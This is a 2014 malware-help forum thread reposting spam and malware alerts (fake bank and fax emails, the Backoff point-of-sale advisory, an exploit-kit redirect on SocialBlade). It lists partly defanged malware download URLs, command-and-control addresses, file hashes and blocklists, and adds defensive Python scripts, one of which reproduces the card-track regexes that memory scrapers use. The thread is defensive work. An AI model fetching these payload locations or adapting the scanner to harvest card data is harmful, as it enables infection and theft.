News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
 1 
 on: August 01, 2014, 02:48:46 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake NatWest SPAM - uses goo.gl links to spread malware
- http://blog.dynamoo.com/2014/08/natwest-you-have-new-secure-message.html
1 Aug 2014 - "This fake NatWest bank message uses the Goo.gl URL shortener to spread malware:

Screenshot: https://2.bp.blogspot.com/-KGgo-AsFrI8/U9tjUZWdXOI/AAAAAAAADdg/yg3nw8reghk/s1600/natwest.png

The link in the email goes to goo .gl/dGDi7l and then downloads a ZIP file from berkleyequine .com/wp-includes/images/Documents-43632.zip, containing a malicious executable Documents-43632.scr which has a VirusTotal detection rate of just 1/54*. The CAMAS** report shows that the malware calls out to the following URLs:
94.23.247.202 /0108uk1/SANDBOXA/0/51-SP2/0/
94.23.247.202 /0108uk1/SANDBOXA/1/0/0/
94.23.247.202 /0108hk1/SANDBOXA/1/0/0/
94.23.247.202 /0108ok1/SANDBOXA/1/0/0/
acanthe .be/css/01u1.rar
dirbeen .com/misc/01u1.rar
porfintengoweb .com/css/heap_61_id3.rar
sso-unidadfinanzas .com/images/heap_61_id3.rar
theothersmag .com/covers/opened.rar
firstfiresystems.com/css/slimbox/opened.rar
The characteristics of this malware are very similar to this one seen yesterday***, and you can be assured that there are other goo .gl URLs and download locations in addition to the one listed here... Google don't make it easy to report spammy links and they are awfully slow to respond to reports, but their reporting form is at goo.gl/spam-report if you want to try it...
Recommended blocklist:
94.23.247.202
acanthe .be
dirbeen .com
porfintengoweb .com
sso-unidadfinanzas .com
theothersmag .com
firstfiresystems .com
berkleyequine .com
"
* https://www.virustotal.com/en-gb/file/5942b89dc3b40cf47cb736cb20909489182d3cef6c20a183c25d38adb8372e48/analysis/1406886192/

** http://camas.comodo.com/cgi-bin/submit?file=5942b89dc3b40cf47cb736cb20909489182d3cef6c20a183c25d38adb8372e48

*** http://blog.dynamoo.com/2014/07/new-fax-spam-using-googl-shortening.html

94.23.247.202: https://www.virustotal.com/en/ip-address/94.23.247.202/information/
___

Fake NYC Homicide Suspect SPAM - using goo .gl shortener to spread malware
- http://blog.dynamoo.com/2014/08/new-york-city-police-homicide-suspect.html
1 Aug 2014 - "... This spam is slightly unusual..
   From:     ALERT @nyc .gov [ALERT@ static-23-106-230-77.ipcom.comunitel .net]
    Date:     1 August 2014 10:43
    Subject:     Homicide Suspect
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-10078
    Bulletin Author: BARILLAS #9075
    Sending User #: 94265
    APBnet Version: 287320
    The bulletin is a pdf file. To download please follow the link below (Google Disk Drive service):
    https ://goo .gl/RwNKEA ...


The link in the email is goo .gl/RwNKEA which goes to unionlawgroup .com/wp-content/images/Documents-43632.zip which is exactly the same payload as used in this spam*...
Blocking unionlawgroup .com is probably a good idea."
* http://blog.dynamoo.com/2014/08/natwest-you-have-new-secure-message.html

50.63.221.1: https://www.virustotal.com/en/ip-address/50.63.221.1/information/
___

Fake Googlebots increasingly used to launch DDoS Attacks
- http://atlas.arbor.net/briefs/index#683046610
Elevated Severity
31 Jul 2014 - "Spoofed Googlebots, Google's search bot software, are increasingly being used to launch application-layer DDoS attacks.
Analysis: The fake Googlebots have also been observed scraping sites, sending spam, and hacking as well. These bots could prove an effective tool, as even well-protected companies with appropriate blocking rules still allow for Google. However, the fake Googlebots are easily identified, as legitimate Googlebots come from a predetermined IP address range. [ http://threatpost.com/phony-googlebots-becoming-a-real-ddos-attack-tool/107317 ] "
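Added example (mine, not from the Arbor brief or the post above): the check Google documents for telling its crawler from an impostor is forward-confirmed reverse DNS, which is why a spoofed Googlebot is "easily identified" even on a site that whitelists Google. The script runs that check over constructed access-log lines; the DNS tables are made up so it runs offline, and in production you would replace the two lookup callables with real resolver calls.

```python
import ipaddress
import re

# Constructed reverse/forward DNS tables so the example runs offline.
# In production pass e.g. lambda ip: socket.gethostbyaddr(ip)[0] and
# lambda host: socket.gethostbyname_ex(host)[2] instead.
REVERSE_DNS = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",   # genuine crawler
    "203.0.113.7": "crawl-66-249-66-1.googlebot.com",   # forged PTR: forward lookup will not agree
    "198.51.100.9": "mail.example.net",                  # not Google at all
}
FORWARD_DNS = {
    "crawl-66-249-66-1.googlebot.com": ["66.249.66.1"],
    "mail.example.net": ["198.51.100.9"],
}

# Google documents that genuine crawler PTR names end in one of these zones.
GOOGLE_ZONES = (".googlebot.com", ".google.com")

# Constructed combined-format log lines; three requests claim to be Googlebot.
SAMPLE_LOG = """\
66.249.66.1 - - [01/Aug/2014:02:48:46 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.7 - - [01/Aug/2014:02:48:47 +0000] "GET /search?q=a HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.9 - - [01/Aug/2014:02:48:48 +0000] "GET / HTTP/1.1" 200 10 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.0.2.5 - - [01/Aug/2014:02:48:49 +0000] "GET / HTTP/1.1" 200 10 "-" "curl/7.30.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')


def is_verified_googlebot(ip, reverse_lookup, forward_lookup):
    """Forward-confirmed reverse DNS: the PTR name must sit in a Google zone and
    the address records for that name must point back at the same IP."""
    try:
        ipaddress.ip_address(ip)
        host = reverse_lookup(ip).rstrip(".").lower()
    except (ValueError, KeyError, OSError):
        return False
    if not host.endswith(GOOGLE_ZONES):
        return False
    try:
        return ip in forward_lookup(host)
    except (KeyError, OSError):
        return False


def classify_crawler_claims(log_text, reverse_lookup=REVERSE_DNS.__getitem__,
                            forward_lookup=FORWARD_DNS.__getitem__):
    """Return {ip: 'verified' | 'spoofed'} for every request whose User-Agent claims Googlebot."""
    verdicts = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, user_agent = m.group(1), m.group(2)
        if "googlebot" not in user_agent.lower():
            continue
        ok = is_verified_googlebot(ip, reverse_lookup, forward_lookup)
        verdicts[ip] = "verified" if ok else "spoofed"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_crawler_claims(SAMPLE_LOG).items():
        print(f"{ip:15} {verdict}")
```

Spoofed entries are the ones to rate-limit or drop; a forged PTR alone is not enough to pass, because the forward lookup of the claimed name has to agree with the connecting IP.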


 2 
 on: July 31, 2014, 15:52:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Wireshark 1.12.0
- https://www.wireshark.org/download.html
31 Jul 2014 - "The current stable release of Wireshark is 1.12.0. It supersedes all previous releases..."

1.12.0 Release Notes
- https://www.wireshark.org/docs/relnotes/wireshark-1.12.0.html

Bug Fixes
- https://www.wireshark.org/docs/relnotes/wireshark-1.12.0.html#_bug_fixes

- https://www.wireshark.org/lists/wireshark-announce/201407/msg00001.html
___

Wireshark 1.10.9
- https://www.wireshark.org/lists/wireshark-announce/201407/msg00002.html
31 Jul 2014

1.10.9 Release Notes
- https://www.wireshark.org/docs/relnotes/wireshark-1.10.9.html

Bug Fixes
- https://www.wireshark.org/docs/relnotes/wireshark-1.10.9.html#_bug_fixes

- https://www.wireshark.org/security/


 3 
 on: July 31, 2014, 09:18:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake "New fax" SPAM - using goo .gl shortening service
- http://blog.dynamoo.com/2014/07/new-fax-spam-using-googl-shortening.html
31 July 2014 - "Here are a couple of variations of a fax -spam- using the goo .gl shortening service:
   From:     Fax [fax@ victimdomain]
    Date:     31 July 2014 11:23
    Subject:     You've received a new fax
    New fax at SCAN5735232 from EPSON by https ://victimdomain
    Scan date: Thu, 31 Jul 2014 19:23:11 +0900
    Number of pages: 2
    Resolution: 400x400 DPI
    You can download your fax message at:
    https ://goo.gl /1rBYjl
    (Google Disk Drive is a file hosting service operated by Google, Inc.)
    ------------------------------
    From:     FAX [fax@ qcom .co.uk]
    Reply-to:     FAX [fax@ qcom .co.uk]
     fax@ localhost
    Date:     31 July 2014 10:53
    Subject:     You have received a new fax message
    You have received fax from EPS76185555 at victimdomain
    Scan date: Thu, 31 Jul 2014 16:53:10 +0700
    Number of page(s): 2
    Resolution: 400x400 DPI
    Download file at google disk drive service - dropbox.
    https ://goo .gl/t8jteI ...


There seems to be an uptick of goo.gl spam.. if you receive something like this you can report it to goo.gl/spam-report as malware... I've seen three different URLs... Obviously, this is a ZIP file. It contains a malicious executable Document-95722.scr which has a VirusTotal detection rate of just 1/54*. The CAMAS report** shows that the malware reaches out to the following locations to download further components:
andribus .com/images/images.rar
owenscrandall .com/images/images.rar
Incidentally, if you add a "+" to the end of the goo.gl URL you can see how many people have clicked through. For example:
> https://1.bp.blogspot.com/-XGnNezE_8BI/U9on1yFs3VI/AAAAAAAADdQ/LReRBZvJpFQ/s1600/goo-gl.png
164 clicks isn't a lot, but there are multiple URLs in use.
Recommended blocklist:
andribus .com
owenscrandall .com
esys-comm .ro
autoescuelajoaquin .com
pinkfeatherproductions .com
"
* https://www.virustotal.com/en-gb/file/503d73e26e0c92469ffb70da26d323da0c266a2b3efe90114f61c27883e995cc/analysis/1406804074/

** http://camas.comodo.com/cgi-bin/submit?file=503d73e26e0c92469ffb70da26d323da0c266a2b3efe90114f61c27883e995cc
___

Fake Evernote "File has been sent" SPAM
- http://blog.dynamoo.com/2014/07/evernote-file-has-been-sent-spam.html
31 July 2014 - "I've never understood Evernote. Something to do with elephants I think. But this spam isn't from them anyway..
   Date:      Thu, 31 Jul 2014 12:26:53 +0200 [06:26:53 EDT]
    From:      EVERNOTE [lcresknpwz@ business .telecomitalia .it]
    Subject:      File has been sent [redacted]
    DSC_9426679.jpg attached to the letter
    Copyright 2014 Evernote Corporation. All rights reserved


The file attached is actually DSC_9426679.zip and not .jpg, containing a malicious executable DSC_8832966.exe with a VirusTotal detection rate of 7/53*. The CAMAS report** shows that the malware attempts to download an additional component... These download locations are the same as yesterday's Amazon spam run***. The downloaded file has a VT detection rate of 3/53****. The recommended blocklist is the same as yesterday."
* https://www.virustotal.com/en-gb/file/0b875692701e0b4cdaa82068c2bca8d9f7de7f1d0154cbaaaefb5316d1a785dd/analysis/1406813029/

** http://camas.comodo.com/cgi-bin/submit?file=0b875692701e0b4cdaa82068c2bca8d9f7de7f1d0154cbaaaefb5316d1a785dd

*** http://blog.dynamoo.com/2014/07/amazoncouk-your-amazon-order-spam_30.html

**** https://www.virustotal.com/en-gb/file/b6eb2c5b907cc5fb1092701d33caea52a0ed8171bc2f2d83cdd2b89deb120366/analysis/1406813571/
___

ADP Payroll Spam
- http://threattrack.tumblr.com/post/93406211803/adp-payroll-spam
July 31, 2014 - "Subjects Seen:
   ACH Notification
Typical e-mail details:
   Attached is a summary of Origination activity for 07/31/2014
    Download it from Google Disk Drive Inc.:
    goo .gl/mp4Vh3
    If you need assistance please contact us via e-mail during regular business hours.
    Thank you for your cooperation.


Malicious URLs:
    espressomachinesinfo .com/wp-includes/images/Document-83265.zip
Malicious File Name and MD5:
    Document-83265.scr (3603D5B08D83130414B264FAF3EE41E1)


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3aa710526c0cf4022eb030bd44f2491f/tumblr_inline_n9kz19SPvX1r6pupn.png

Tagged: ADP, Upatre

72.29.66.41: https://www.virustotal.com/en-gb/ip-address/72.29.66.41/information/
___

Fake Xerox WorkCentre SPAM
- http://blog.dynamoo.com/2014/07/scanned-image-from-xerox-workcentre-spam.html
31 July 2014 - "This is a thoroughly old school spam with a malicious attachment.
    Date:      Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
    From:      Local Scan [scan.614@ victimdomain]
    Subject:      Scanned Image from a Xerox WorkCentre
    You have a received a new image from Xerox WorkCentre.
    Sent by: victimdomain
    Number of Images: 5
    Attachment File Type: ZIP [PDF]
    WorkCentre Pro Location: Machine location not set
    Device Name: victimdomain
    Attached file is scanned image in PDF format...


Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contains a malicious executable Image_07312014.scr, scoring a measly 1/54* at VirusTotal. The Comodo CAMAS report** shows that the malware downloads components... There are some further clues in the VirusTotal comments* as to what the malware does. Sophos has also seen the 94.23.247.202 (OVH, France) IP before***.
Recommended blocklist:
94.23.247.202
globe-runners .com
lucantaru .it
mediamaster-2000 .de
ig-engenharia .com
upscalebeauty .com
lagrimas.tuars .com
"
* https://www.virustotal.com/en-gb/file/beff9a8e4d9ddd5766cd66fdbfda40c7935900a035cb6681d0dc468affa02a7a/analysis/1406832159/

** http://camas.comodo.com/cgi-bin/submit?file=beff9a8e4d9ddd5766cd66fdbfda40c7935900a035cb6681d0dc468affa02a7a

*** http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AHXK/detailed-analysis.aspx

94.23.247.202: https://www.virustotal.com/en-gb/ip-address/94.23.247.202/information/


 4 
 on: July 31, 2014, 06:33:52  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Backoff... Malware
Backoff Point-of-Sale Malware
- https://www.us-cert.gov/ncas/alerts/TA14-212A
July 31, 2014 - "... malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1] Apple Remote Desktop,[2] Chrome Remote Desktop,[3] Splashtop 2,[4] Pulseway[5], and LogMeIn Join.Me[6] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications are located, the suspects attempted to brute force the login feature of the remote desktop solution. After gaining access to what was often administrator or privileged access accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via an encrypted POST request. USSS, NCCIC/US-CERT and Trustwave Spiderlabs have been working together to characterize newly identified malware dubbed "Backoff", associated with several PoS data breach investigations. At the time of discovery and analysis, the malware variants had low to -zero- percent anti-virus detection rates, which means that fully updated anti-virus engines on fully patched computers could -not- identify the malware as -malicious- ..."
Description: “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including 1.4, 1.55 (“backoff”, “goo”, “MAY”, “net”), and 1.56 (“LAST”). These variations have been seen as far back as October 2013 and continue to operate as of July 2014. In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4) which does not include keylogging functionality. Additionally, 1.55 ‘net’ removed the explorer.exe injection component:
- Scraping memory for track data
- Logging keystrokes
- Command & control (C2) communication
- Injecting -malicious- stub into explorer.exe
The malicious stub that is -injected- into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped. The malware is responsible for scraping memory from running processes on the victim machine and searching for track data. Keylogging functionality is also present in most recent variants of “Backoff”. Additionally, the malware has a C2 component that is responsible for uploading discovered data, updating the malware, downloading/executing further malware, and uninstalling the malware.
Impact: The impact of a compromised PoS system can affect both the businesses and consumer by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business’ brand and reputation, while consumers’ information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now.
Solution: At the time this advisory is released, the variants of the “Backoff’ malware family are largely -undetected- by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It’s important to maintain up-to-date AV signatures and engines as new threats such as this are continually being added to your AV solution...

(More detail at the us-cert URL above.)
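Added example, not from the US-CERT alert: what "scraping memory for track data" means in practice. Backoff and similar families run a pattern search over other processes' memory for track 1 / track 2 data and keep only Luhn-valid hits; the same scan, run by a defender over a process dump from a PoS host, shows whether card data is sitting in memory in the clear. The buffer below is constructed and the PANs are the usual public test numbers.

```python
import re

# Track 2 as it sits in PoS process memory: ";PAN=YYMM<service code><discretionary>?"
# Track 1 format B: "%BPAN^NAME^YYMM<service code>...". These are the layouts a scraper hunts for.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d{0,30})\?")
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z0-9 /.'-]{2,26})\^(\d{2})(\d{2})(\d{3})")


def luhn_ok(pan):
    """Mod-10 check; scrapers apply it to cut false positives, and so should a scanner."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep BIN and last four only; a scanner must never write full PANs to its own log."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf):
    """Scan a bytes buffer (e.g. a process memory dump) for Luhn-valid track 1/2 data."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 2, "offset": m.start(), "pan": mask_pan(pan),
                         "expiry": f"20{m.group(2).decode()}-{m.group(3).decode()}",
                         "service_code": m.group(4).decode()})
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 1, "offset": m.start(), "pan": mask_pan(pan),
                         "name": m.group(2).decode("ascii").strip(),
                         "expiry": f"20{m.group(3).decode()}-{m.group(4).decode()}",
                         "service_code": m.group(5).decode()})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed "memory": two Luhn-valid public test PANs and one string that fails Luhn.
SAMPLE_MEMORY = (
    b"\x00" * 8
    + b";4111111111111111=1705101123456789?"              # track 2, valid
    + b"\x00\x00junk\x00"
    + b"%B5555555555554444^DOE/JOHN^17051010000000000?"  # track 1, valid
    + b"\x00"
    + b";4111111111111112=1705101?"                       # fails Luhn: not card data
    + b"\x00" * 8
)

if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

Run against a dump of the payment application's process (not the whole machine) and any hit is evidence that the terminal exposes cleartext track data to exactly the scrape Backoff performs.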


 5 
 on: July 30, 2014, 17:30:34  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Microsoft Security Advisory 2915720
Changes in Windows Authenticode Signature Verification
- https://technet.microsoft.com/en-us/library/security/2915720
December 10, 2013 | Updated: July 29, 2014 - "... This advisory was revised on July 29, 2014 to announce that the stricter Windows Authenticode signature verification behavior described here will be enabled on an opt-in basis and not made a default behavior in supported releases of Microsoft Windows..."
V1.4 (July 29, 2014): Revised advisory to announce that Microsoft no longer plans to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows. It remains available as an opt-in feature. See the Advisory FAQ section for more information.


 6 
 on: July 30, 2014, 01:42:46  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake 'documents ready for download' SPAM – PDF malware
- http://myonlinesecurity.co.uk/documents-ready-download-fake-pdf-malware/
30 July 2014 - "Your documents are ready for download is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your documents 6419165973846 are ready , please sign them and email them back.
Thank you
John Garret
Level III Account Management
817-768-8742 office
817-874-8795 cell
johngarret@ natwest .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
The security of personal information about you is our priority. We protect this information by maintaining physical, electronic, and procedural safeguards that meet applicable law. We train our employees in the proper handling of personal information. When we use other companies to provide services for us, we require them to protect the confidentiality of personal information they receive...


30 July 2014: Documents_3922929617733.rar (10 kb) : Extracts to Documents.scr
Current Virus total detections: 2/53* . This Your documents are ready for download is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/634d23123e3e3c1c5ef4f20be53b81541fc21a77a9fcd73f383917eaeade8ed9/analysis/1406710734/
___

Fake "Amazon order" SPAM
- http://blog.dynamoo.com/2014/07/amazoncouk-your-amazon-order-spam_30.html
30 July 2014 - "Another -fake- Amazon spam with a malicious payload:

Screenshot: https://4.bp.blogspot.com/-zOkh76LGgdk/U9j-Nnjd49I/AAAAAAAADcY/wGaN7utyHfg/s1600/amazon4.png

There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53*. The Comodo CAMAS report** shows that it downloads a further component...
This second executable has a VT detection rate of 5/54***..."
(Long recommended blocklist at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/7465f6690f1b4e1c80e0f281241b33a643d6deb4986a791a8d35633ec2b7f226/analysis/1406729013/

** http://camas.comodo.com/cgi-bin/submit?file=7465f6690f1b4e1c80e0f281241b33a643d6deb4986a791a8d35633ec2b7f226

*** https://www.virustotal.com/en-gb/file/0836b9070a5c99a36d8e68438358f4e56d42555eff78d442f06e63f2f381779c/analysis/1406729311/
___

Fake Order status 30.07.2014.xls – XLS malware
- http://myonlinesecurity.co.uk/order-status-540130-30-07-2014-xls-fake-xls-malware/
30 July 2014 - "Order status -540130 30.07.2014.xls is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... An email received coming from a -random- name with -no- company details and a totally blank body and a subject of  Order status -540130 30.07.2014.xls ( different order numbers ) with a zip attachment
30 July 2014 : 540130-30.07.2014.zip ( 47 kb) : Extracts to   order-8301138-30.07.2014.xls.exe
Current Virus total detections: 9/54* . This  Order status -540130 30.07.2014.xls  is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Excel spreadsheet file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c05513fab83c7080dbe7ccf7b8cb4cca506771cc0fb378ab085398cd7c33ec50/analysis/1406736903/
___

Fake "Payslip" SPAM
- http://blog.dynamoo.com/2014/07/payslip-spam.html
30 July 2014 - "...  terseness works with this kind of message:
    From:     Richard Mason [richardm254@ gmail .com]
    Date:     30 July 2014 21:23
    Subject:     Payslip
    Please find attached the payment slip.
Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

> https://3.bp.blogspot.com/-G4xRic3PZb4/U9liJUQc5lI/AAAAAAAADco/eFJZQpx9YJI/s1600/js.png

Clicking OK downloads an executable from www.greenexpress .ge/swift//payslip.exe which you are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..
> https://3.bp.blogspot.com/-TfUbI6lM0Sw/U9lmBNjobKI/AAAAAAAADc8/0F3omwn40kk/s1600/js2.png
..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded... The malware itself has a VirusTotal detection rate of 31/53*... Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter..."
* https://www.virustotal.com/en-gb/file/2ce9a7e9422e6c105281effc01fb3f0141e10cc32a62efff0b20b4b6d4ceec84/analysis/1406754444/

198.50.169.4: https://www.virustotal.com/en-gb/ip-address/198.50.169.4/information/
___

New Crypto-Ransomware in the wild
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-crypto-ransomware-emerge-in-the-wild/
July 30, 2014 - "... new crypto-ransomware variants that use new methods of encryption and evasion... 'Cryptoblocker' will not drop any text files instructing the victim on how to decrypt the files. Rather, it displays the dialog box below. Entering a transaction ID in the text box will trigger a message stating that the “transaction was sent and will be verified soon.”:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/07/cryptob1.jpg
... This malware does not use CryptoAPIs, a marked difference from other ransomware. CryptoAPIs are used to make RSA keys, which were not used with this particular malware. This is an interesting detail considering RSA keys would make decrypting files more difficult. Instead, we found that  the advanced encryption standard (AES) is found in the malware code. A closer look also reveals that the compiler notes were still intact upon unpacking the code... Based on feedback from the Trend Micro Smart Protection Network, the US is the top affected country, followed by France and Japan. Spain and Italy round up the top five affected countries.
Countries affected by Cryptoblocker:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/07/Cryptolocker-Infection-01.jpg
... These ransomware variants prove that despite significant takedowns, cybercriminals will continue to find ways to victimize users. Users should remain cautious when dealing with unfamiliar files, emails, or URL links. While it might be tempting to pay the ransom for encrypted files, there is no guarantee that the cybercriminals will decrypt the ransomed files..."
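Added example (mine, not from dynamoo or myonlinesecurity) covering the lures in this and the previous spam posts: a shortener link in the body, a ZIP whose member carries a doubled extension (.xls.exe) or ends in .scr, and an HTML attachment that is base64-encoded on the wire and only gives up its .exe link once decoded, which is the point the Payslip write-up makes. The sample message is constructed with placeholder domains.

```python
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from urllib.parse import urlsplit

EXEC_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs", ".jar")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt")
SHORTENERS = {"goo.gl", "bit.ly", "tinyurl.com", "t.co"}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)


def executable_disguise(name):
    """'order-...xls.exe' -> 'double-extension', 'Documents.scr' -> 'executable', else None."""
    low = name.lower()
    if not low.endswith(EXEC_EXTS):
        return None
    stem = low.rsplit(".", 1)[0]
    return "double-extension" if stem.endswith(DOC_EXTS) else "executable"


def url_findings(text, where):
    out = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        if (parts.hostname or "").lower() in SHORTENERS:
            out.append({"kind": "shortener_link", "where": where, "detail": url})
        if parts.path.lower().endswith(EXEC_EXTS):
            out.append({"kind": "executable_url", "where": where, "detail": url})
    return out


def triage_message(raw):
    """Walk a raw RFC 822 message and report the lures seen in these spam runs."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    body = msg.get_body(preferencelist=("plain", "html"))
    if body is not None:
        findings += url_findings(body.get_content(), "body")
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""   # undoes the base64 transfer encoding
        kind = executable_disguise(name)
        if kind:
            findings.append({"kind": kind, "where": name, "detail": name})
        if data.startswith(b"PK"):
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    for member in zf.namelist():
                        if executable_disguise(member):
                            findings.append({"kind": "executable_in_zip", "where": name, "detail": member})
            except zipfile.BadZipFile:
                findings.append({"kind": "corrupt_zip", "where": name, "detail": ""})
        if part.get_content_type() == "text/html":
            # A filter that only greps the raw message never sees this link; it is base64 on the wire.
            findings += url_findings(data.decode("utf-8", "replace"), name)
    return findings


def build_sample_message():
    """Constructed message combining the lures quoted above; domains are placeholders."""
    msg = EmailMessage()
    msg["From"] = "Richard Mason <richardm254@example.com>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Payslip"
    msg.set_content("Please find attached the payment slip.\nOr download it from https://goo.gl/abc123\n")
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("order-8301138-30.07.2014.xls.exe", b"MZ placeholder, not a real binary")
    msg.add_attachment(zbuf.getvalue(), maintype="application", subtype="zip",
                       filename="540130-30.07.2014.zip")
    html = ('<html><body><script>alert("Payment slip ready");'
            'window.location="http://malware.example/swift/payslip.exe";</script></body></html>')
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="swift copy-Payment-Slip.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for f in triage_message(build_sample_message()):
        print(f"{f['kind']:18} {f['where']}: {f['detail']}")
```

Feed it the raw .eml from the mail gateway quarantine; the zip inspection is what catches the "spoofed icon" trick even on a client that hides known extensions.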


 7 
 on: July 29, 2014, 11:32:18  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

SocialBlade .com compromised - redirection chain to Nuclear Pack exploit kit
- http://blog.malwarebytes.org/exploits-2/2014/07/socialblade-com-compromised-starts-redirection-chain-to-nuclear-pack-exploit-kit/
July 29, 2014 - "...  the YouTube stats tracker site SocialBlade .com is connected with malicious redirections that also lead to the Nuclear Pack EK.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/socialblade2.png
The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit. According to site tracker SimilarWeb, SocialBlade .com has a global rank of 5,791 and had around 3.6 million visits last month... Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references. The intruder was in a core JavaScript file... the JavaScript code writes the iframe and launches the redirection workflow... Java exploit (CVE-2013-2465?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.jar
VT (4/52*)* https://www.virustotal.com/en/file/f0641b46121c7fa32e58904b4cc6a0b2c220253a61cf23a0aa26f26d045279e5/analysis/1406296526/
Internet Explorer exploit (CVE ?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.htm
VT (0/53**)
** https://www.virustotal.com/en/file/7f6906b5d52b4133b97e3ccb192ea0d46c3ef79b024bfd3ccaff9f0eed2ae651/analysis/
Payload:
hxxp ://50d88d1ad05y.correctzoom .uni.me/f/1406197380/7
VT (17/52***)
*** https://www.virustotal.com/en/file/da3857d5496c3982222c330bd3d711bbe21d325da094050772b29838edf01e20/analysis/1406311279/
...  most likely leads to ad-fraud related malware (clickjacking etc.). We have notified the owners of SocialBlade .com so they can fix the issue ASAP and prevent unnecessary malware infections..."

uni .me: 192.95.12.33: https://www.virustotal.com/en-gb/ip-address/192.95.12.33/information/

